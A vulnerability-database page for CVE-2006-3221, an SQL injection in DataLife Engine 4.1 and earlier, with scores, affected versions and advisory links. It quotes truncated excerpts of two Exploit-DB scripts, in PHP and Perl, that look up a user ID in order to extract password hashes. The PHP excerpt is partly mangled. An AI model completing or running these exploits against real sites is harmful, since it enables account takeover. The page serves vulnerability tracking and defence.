CVE-2006-3221
published 2006-06-24CVE-2006-3221: SQL injection vulnerability in index.php in DataLife Engine 4.1 and earlier allows remote attackers to execute arbitrary SQL commands via double-encoded values…
PriorityP338high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.24%
65.4th percentile
SQL injection vulnerability in index.php in DataLife Engine 4.1 and earlier allows remote attackers to execute arbitrary SQL commands via double-encoded values in the user parameter in a userinfo subaction.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| softnews_media_group | datalife_engine | <= 4.1 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
DataLife Engine 4.1 - SQL Injection
exploitdb·2006-06-21
CVE-2006-3221 DataLife Engine 4.1 - SQL Injection
DataLife Engine 4.1 - SQL Injection
---
Lite Version for DLE
';
if ($argc [table prefix]\n";
print " ex.: " . $argv[0] . " datalife.engine.net admin\n";
credits();
exit;
}
//DEFINE USER ID
$urla = 'http://' . $argv[1] . '/index.php?subaction=userinfo&user=' . $argv[2];
$result = file_get_contents($urla);
$str1 = 'user='; #index.php?do=pm&doaction=newpm&user=
$position = strpos($result, $str1);
if ($position === false){ print "\n\rSorry, no match found for user " . $argv[2]; credits();}
$str2 = '">';
$pos = strpos($result, $str2, $position);
$pos1 = $position+5;
$user_id = intval(substr($result, $pos1, $pos-$pos1));
print "Trying to get hash for password of user ". $argv[2] ." with id=" . $user_id . ":\n";
//SOME defines (aka CONFIG =))
if (empty($argv[3])){ $prefix = 'dle_';} #defin
Exploit-DB
DataLife Engine 4.1 - SQL Injection
exploitdb·2006-06-21
CVE-2006-3221 DataLife Engine 4.1 - SQL Injection
DataLife Engine 4.1 - SQL Injection
---
#!/usr/bin/perl
## DataLife Engine sql injection exploit by RST/GHC
## (c)oded by 1dt.w0lf
## RST/GHC
## http://rst.void.ru
## http://ghc.ru
## 18.06.06
use LWP::UserAgent;
use Getopt::Std;
getopts('u:n:p:');
$url = $opt_u;
$name = $opt_n;
$prefix = $opt_p || 'dle_';
if(!$url || !$name) { &usage; }
$s_num = 1;
$|++;
$n = 0;
&head;
print "\r\n";
print " [~] URL : $url\r\n";
print " [~] USERNAME : $name\r\n";
print " [~] PREFIX : $prefix\r\n";
$userid = 0;
print " [~] GET USERID FOR USER \"$name\" ...";
$xpl = LWP::UserAgent->new() or die;
$res = $xpl->get($url.'?subaction=userinfo&user='.$name);
if($res->as_string =~ /do=lastcomments&userid=(\d*)/) { $userid = $1; }
elsif($res->as_string =~ /do=pm&doaction=newpm&user=(\d*)/) { $userid = $1; }
No writeups or analysis indexed.
http://secunia.com/advisories/20765http://www.securityfocus.com/bid/18592http://www.vupen.com/english/advisories/2006/2486https://exchange.xforce.ibmcloud.com/vulnerabilities/27321https://www.exploit-db.com/exploits/1938https://www.exploit-db.com/exploits/1939http://secunia.com/advisories/20765http://www.securityfocus.com/bid/18592http://www.vupen.com/english/advisories/2006/2486https://exchange.xforce.ibmcloud.com/vulnerabilities/27321https://www.exploit-db.com/exploits/1938https://www.exploit-db.com/exploits/1939
2006-06-24
Published